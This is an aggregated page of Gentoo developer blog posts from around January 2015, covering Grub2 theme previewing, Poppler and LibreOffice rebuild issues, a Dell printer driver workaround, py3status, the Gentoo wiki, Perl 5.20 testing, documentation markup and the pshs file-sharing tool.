When I first wrote about a (potentially too lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around so that it would become harder to pick one than to find one. As you know, that didn’t happen.

Therefore, I am taking a few more steps now:

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.
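Done by hand, those steps would look roughly like this sketch (sizes, offsets and device names are illustrative; the real tool also generates a grub.cfg that selects the theme and cleans everything up):

```shell
# Sparse disk as a regular file, with one Linux partition starting at 1MiB
truncate -s 64M disk.img
echo 'start=2048, type=83' | sfdisk disk.img
# Format the partition in place (offset 2048 sectors = 1048576 bytes)
mkfs.ext2 -F -E offset=1048576 disk.img 63M
# The remaining steps need root: attach a loop device, mount, install Grub2
# together with the theme, then boot the image in KVM:
#   sudo losetup -fP --show disk.img              # -> /dev/loopN
#   sudo mount /dev/loopNp1 /mnt
#   sudo grub-install --boot-directory=/mnt/boot /dev/loopN
#   sudo cp -r mytheme /mnt/boot/grub/themes/
#   sudo umount /mnt && sudo losetup -d /dev/loopN
#   kvm -hda disk.img
```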

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone
git clone
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuptools packaging and a Gentoo ebuild, that gets a bit easier still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software
  • it needs root permissions for some parts (calling sudo)
  • so I don’t take any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example uses the --image switch for background-image-only themes, with a 640×480 rendering of the vector remake of gentoo-cow:

The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!


New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)


I’ve been looking around for Grub2 themes a bit and started a dedicated overlay to not litter the main repository. The overlay

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I did put it into Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved for a license, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including icons is not. I am considering adding an icons USE flag to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.

More to come on Grub2 themes. Stay tuned.

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)

As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously, Poppler (app-text/poppler) used to have stable branches with an even middle version number, say e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... with a (most of the time) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in development releases such as, say, 0.25.1, with an odd middle number; these we never packaged in Gentoo anyway.

Now, the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now 0.30.0 another month later. Unsurprisingly, the ABI and the soversion of libpoppler.so have changed each time, triggering in Gentoo a rebuild of all applications linking to it. This includes among other things LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than all the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits to all the other binary packages of the distro.
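A sketch of how that works at the ebuild level (the numbers are illustrative, not actual Poppler soversions):

```
# In the app-text/poppler ebuild: the subslot mirrors the library soversion
SLOT="0/51"

# In a consumer ebuild (e.g. Inkscape, LibreOffice): the := slot operator
# records the subslot at build time, so a 0/51 -> 0/52 bump triggers
# an automatic rebuild of the consumer
RDEPEND="app-text/poppler:="
```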

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the near future. If things get too bad, you can always mask a new Poppler version in /etc/portage/package.mask yourself (but better check for security bugs then; glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.
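Masking a release takes a single line (the version below is just an example):

```
# /etc/portage/package.mask
# skip this Poppler release; remember to watch glsa-check for security issues
=app-text/poppler-0.30.0
```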

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that has produced and still produces some Linux-based products would also provide CUPS drivers for its printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever one had “net” in the title, as the printer is connected directly to the network.) Upload ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.

Everything works as expected for me, and in color!

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour for slock 1.1. Now that slock 1.2 is out and in the Portage tree in Gentoo, the ‘savedconfig’ USE flag behaves a little differently than it used to. In 1.1, the ‘savedconfig’ USE flag would essentially copy the file to /etc/portage/savedconfig/x11-misc/slock-$version. Now, in slock 1.2, there is still a config file in that location, but it is not just a copy of the file. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a name for a generic colour (like “black”) or the hex representation for the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) is NOT indicating a comment, and MUST remain. If you remove it, slock 1.2 will fail to compile
  • The COLOR1 variable is for the default colour of the background, whilst the COLOR2 variable is for the background colour once one starts typing on a slocked screen

Hope that this information helps for those people using slock (especially within Gentoo Linux).


January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)


It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS in the news item on Rocket, CoreOS’s fork/re-write of Docker.

I ran into CoreOS again at 31C3 and learned it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a python-related eclass and the app-office/libreoffice ebuilds (any version), recently self-generated (see below for the exact timeframe) libreoffice binary packages can fail to install with the error

* ERROR: app-office/libreoffice- failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. Current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0, which I’d like to dedicate to the person behind all the nice improvements this release features: @tablet-mode!

His idea in issue #44 was to make py3status modules configurable. After some thought, and after merging in my own development plans, we ended up with what I believe are the most ambitious features py3status has provided so far.


The logic behind this release is that py3status now wraps and extends your i3status.conf, which allows all the following crazy features:

Click events are now supported for all your i3bar modules, i3status and py3status alike, thanks to the new on_click parameter, which you can use like any other i3status.conf parameter on all modules. It has never been so easy to handle click events!

This is a quick and small example of what it looks like :

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
}
  • All py3status contributed modules are now shipped and usable directly without the need to copy them to your local folder. They also get to be configurable directly from your i3status config (see below)

No need to copy and edit the contributed py3status modules you like and wish to use; you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user-loaded ones) are now loaded and ordered using the usual order += syntax in your i3status.conf!
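Loading, ordering and configuring a contributed module then looks roughly like this sketch (the module name and its parameters are made up for illustration):

```
# i3status.conf — py3status modules use the same ordering syntax as i3status
order += "disk /"
order += "sysinfo"        # hypothetical contributed py3status module

sysinfo {
    format = "CPU: {cpu}%"
    on_click 1 = "exec xterm -e htop"
}
```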

  • All modules have been improved, cleaned up and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever!


  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky: py3status is now packaged on Fedora Linux.
  • All of you users: py3status has passed 100 stars on github, and I’m still amazed by this. @Lujeni’s prophecy has come true :)
  • I still have some nice ideas in stock for even more functionality, stay tuned!

January 03, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Gentoo Wiki is growing (January 03, 2015, 08:09 UTC)

Perhaps it is because of the winter holidays, but the last weeks I’ve noticed a lot of updates and edits on the Gentoo wiki.

The move to the Tyrian layout, whose purpose is to eventually become the unified layout for all Gentoo resources, happened first. Then, three common templates (Code, File and Kernel) were deprecated in favor of their “*Box” counterparts (CodeBox, FileBox and KernelBox). These provide better parameter support (which should make future updates of the templates easier to implement) as well as syntax highlighting.

But the wiki also saw a number of contributions being added. I added a short article on Efibootmgr as the Gentoo handbook now also uses it for its EFI related instructions, but other users added quite a few additional articles as well. As they come along, articles are being marked by editors for translation. For me, that’s a trigger.

Whenever a wiki article is marked for translations, it shows up on the PageTranslation list. When I have time, I pick one of these articles and try to update it to move it to a common style (the Guidelines page is the “official” one, and I have a Styleguide in which I elaborate a bit more on its use). Having a common style gives a better look and feel to the articles (as they are then more alike), gives a common documentation development approach (so everyone can join in and update documentation in a similar layout/structure) and – most importantly – reduces the number of edits that do little more than switch from one formatting to another.

When an article has been edited, I mark it for translation, and then the real workhorses on the wiki start. We have several active translators on the Gentoo wiki, whom we cannot thank enough for their work (I started at Gentoo as a translator myself, so I have some feeling for their work). They make the Gentoo documentation reachable for a broader audience. Thanks to the use of the translation extension (kindly offered by the Gentoo wiki admins, who have been working quite hard the last few weeks on improving the wiki infrastructure) translations are easier to handle and follow through.

The advantage of a translation-marked article is that any change on the article also shows up on the list again, allowing me to look at the change and perform edits when necessary. For the end user, this is behind the scenes – an update on an article shows up immediately, which is fine. But for me (and perhaps other editors as well) this gives a nice overview of changes to articles (watchlists can only go so far) and also shows the changes in a simple yet efficient manner. Thanks to this approach, we can more actively follow up on edits and improve where necessary.

Now, editing is not always just a few minutes of work. Consider the GRUB2 article on the wiki. It was marked for translation, but had some issues with its style. It was very verbose (which is not a bad thing, but suggests splitting the information across multiple articles) and had quite a few open discussions on its Discussions page. I started editing the article around 13.12h local time, and ended at 19.40h. Unlike with offline documentation, the entire process of the editing can be followed through the page’s history. And although I’m still not 100% satisfied with the result, it is imo easier to follow and read now.

However, don’t get me wrong – I do not feel that the article was wrong in any way. Although I would appreciate articles that immediately follow a style, I would rather see more contributions (which we can then edit towards the new style) than start penalizing contributors who don’t use the style. That would be counterproductive, because it is far easier to update the style of an article than to write articles. We should try and get more contributors to document aspects of their Gentoo journey.

So, please keep them coming. If you find a lack of (good) information for something, start jotting down what you know in an article. We’ll gladly help you out with editing and improving the article then, but the content is something you are probably best to write down.

January 02, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Most of us in the Gentoo Perl packaging team are already running ~arch Perl even on otherwise stable machines, and Perl 5.20 is looking very good so far. Our current plan is to wait for another month or so and then file the stabilization request in February. This would be a real achievement, since at that time we'd actually have the latest and greatest upstream stable Perl release also stable in Gentoo; this hasn't been the case for a very long time.
Of course, we need testers for that; the architecture teams cannot possibly try out all Perl programs in Gentoo with the new version. So, if you're feeling adventurous, and if you are running a fully updated stable system, please help us!
What do you need to do? First, upgrade perl-cleaner to ~arch by placing the following line in your package.keywords (or package.accept_keywords)
and updating perl-cleaner (to currently 2.19):
emerge -u1a perl-cleaner
Then, upgrade Perl (and only Perl) to ~arch by placing the following exact three lines in your package.keywords (or package.accept_keywords):
Then, upgrade your system with
emerge -uDNav world
perl-cleaner --all
This should now already be much easier than with previous Perl versions. In theory, all Perl packages should be rebuilt by emerge via the subslot rebuild mechanism, and perl-cleaner should not find anything left to do, but we cannot be 100% sure of that yet. (Looking forward to feedback.)
Well, and then use Perl and use your system, and if you encounter any problems, file bugs!!!

A final remark: once Perl 5.20 becomes stable, you may want to remove the above keywording lines from your portage configuration again.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Document your project! (January 02, 2015, 16:45 UTC)

After discussing how to track your bugs and your contributions, let’s see what we have for documentation.

Pain and documentation

A healthy Open Source project mainly needs contributors, and contributors are usually your users. You get users if the project is known and useful. (And if you do not have parasitic entities siphoning your work by abusing git-merge; best of luck to io.js and markdown-it in not having this experience, switching names is enough of a pain without it.)

In order to gain mindshare, the best thing is making what you do easier to use, and that requires documenting what you did! The process is usually boring and time-consuming, and every time you change something you have to make sure the documentation still matches reality.

In the opensource community we have multiple options for the kind of documentation we produce and how we produce it.


Wiki

When you need to keep some structure, but you want an easy way to edit it, a wiki can be a good choice and it can lead to nice results. The information present is usually correct and, if enough people keep editing it, up to date.


Pros:

  • The wiki is quick to edit and you can have people contribute by just using a browser.
  • The documentation is indexed easily by search engines.
  • Editing can be restricted to a number of trusted people.

Cons:

  • The information is detached from the actual code and can easily get out of sync.
  • Even if kept up to date, what applies to the current release is not necessarily what your poor user might have.
  • Keeping versioned content is usually not that simple.


Forums

Even if they are usually noisy, forums are a good source of information plenty of the time.
Personally, I try to move interesting bits to a wiki page when I find something that is not completely transient.


Pros:

  • Usually everything requires less developer interaction.
  • Users can share solutions to their problems effectively.

Cons:

  • The information can get stale even quicker than what you have in the wiki.
  • Since it is mainly user-generated, the proposed solutions might be suboptimal.
  • Being highly interactive, it requires more dedicated people to take care of unruly users.


Manuals

There are lots of good toolchains for writing full manuals, as we have in Gentoo.

The old-style xml/docbook toolchains tend to have a really steep learning curve, not to mention even more quirky and wonderful monsters such as LaTeX (and the lesser texinfo). ReStructuredText, asciidoc and some flavour of markdown seem to be better tools for the task if you need speed and want to get contributors up to speed.


Pros:

  • A proper manual can be easily pinned to a specific release.
  • It can be versioned using git.
  • Some people still like something they can print and that has a proper index.

Cons:

  • With the old tools it is a pain to get started.
  • The learning curve can still be unbearable for most contributors.
  • It requires some additional dedication to keep it up to date.

What to use and why

Usually for small projects the manual is the README; once the project grows, a wiki is usually the best place to put notes from multiple people. If you are good at it, a manual is a boon for all your users.

Tools for documentation-in-code such as doxygen or docurium can help a lot if your project has a single codebase.

If you need to unify a LOT of different information, as we have in Gentoo, the problems usually get much more annoying, since you have content written in multiple markups, living in multiple places, and moving it from one place to another usually requires a serious editing effort (like moving from our guidexml to the current semantic wiki).

Markup suggestion


Markdown

I like CommonMark a lot, and I even started to port and extend it to be used in docutils, since I find ReStructuredText too confusing for normal users. Its best quality is its natural flow; its most annoying defect is that there are too many parser discrepancies and sometimes implementations disagree. Still, it is better to have many good implementations than one that is subpar in everything (hi texinfo, I hate your toolchain).


Asciidoc

The markup is quite nice (up to a point) and the toolchain is sort of nice, even if it feels like a Rube Goldberg machine. To my knowledge there is a single implementation of it, and that makes me much more wary of using it in new projects.


ReStructuredText

The markup is not as intuitive as Asciidoc, thus quite far from Markdown's immediate-use feeling, but it has a great toolchain (if you like python) and it can be extended to produce lots of different well-formatted documents.
It comes with loads of markup features that Markdown core lacks: an include directive, table of contents generation, pluggable generic block and span directives, and 3 different flavours of tables.

All in all, it is a good choice if you can come to terms with its complexity.
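As an illustration, here is the kind of thing reStructuredText offers out of the box that Markdown core does not (the file name and table contents are hypothetical):

```rst
.. contents:: Table of Contents

Overview
========

.. include:: intro.rst

.. csv-table:: Release status
   :header: "Branch", "Status"

   "1.0", "stable"
   "1.1", "testing"
```

Each of these would need a parser extension or a separate preprocessor in most Markdown toolchains.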

What’s next

Hopefully during this year among my many smaller and bigger projects, I’ll find time to put together something nice for documentation as well.

December 26, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
pshs — the awesome file sharing tool (December 26, 2014, 16:00 UTC)

For a long time I lacked a proper tool to quickly share a few files for a short time. The tools I was able to find required some setup, needed client counterparts installed, or involved sending my files to a third-party host. So I felt the need to write something new.

The HTTP protocol seemed an obvious choice. Relatively simple, efficient, with some client software installed almost everywhere. So I took HTTP::Server::Simple (I think) and wrote the first version of the script. I added a few features to it, but it never felt good enough…

So back in 2011 I decided to reboot the project. This time I decided to use C and libevent, and that’s how pshs came into being. With some development occurring over the last three years, I have lately started adding new features aimed at turning it into something really awesome.

So what is pshs? It’s a simple, zero-configuration command-line HTTP server for sharing files. You pass it a list of files and it lets you share them.

Screenshot of pshs

But what really makes pshs special are the features:

  1. it shares only the files specified on the command-line — no need for extra configuration, moving files to separate directories etc. It simply returns 404 for any path not specified on the command-line, whether it exists or not.
  2. Full, working Range support. You can resume interrupted downloads and seek freely. Confirmed that playing a movie remotely works just fine.
  3. Unless told otherwise, it chooses a random port to use. You don’t have to decide on one, you can use pshs alongside regular HTTP servers and other services, and you can freely run multiple instances of pshs if you need to. TODO: perform port search until free port is found on the interface having external IP.
  4. Netlink and UPnP support provide the best means to obtain the external IP. If you have one on a local interface, pshs will find and print it. If you don’t, it will try to enable port forwarding using UPnP and obtain the external IP from a UPnP-compliant router.
  5. QRCode printing (idea copied from systemd). Want to text a link to your files? Just scan the code!
  6. MIME-type guessing. Well, it’s not that special, but it makes sure your images show up as images in a web browser rather than opaque files that can only be saved.
  7. Zero-configuration SSL/TLS support — the keys and a self-signed certificate with correct public IP are generated at startup. While this is far from perfect (think of all the browsers complaining about self-signed certificates), it at least gives you the possibility of using encryption. It also prints the certificate fingerprint if you’d like to verify the authenticity.

I also have a few nice ideas in TODO, though I am unsure which of them will actually be implemented:

  1. HTTP digest authentication support — in case you wanted some real security on the files you share.
  2. Download progress reporting — to let you know whether and for how long you need to keep the server up. Sadly, this does not look easy given the current libevent design.
  3. ncurses UI — to provide visual means for progress reporting :). Additional possibilities include keeping server URL on screen, a status line, and possibly scrolling logs.
  4. GTK+ UI with a tray icon and notification daemon support — to provide better desktop integration for sharing files from your favorite file manager.
  5. Recursive directory sharing — currently you have to list all files explicitly. This may include better directory indexes since currently pshs creates only one index of all files.

Which of those features would you find useful? What other features would you like to see in pshs?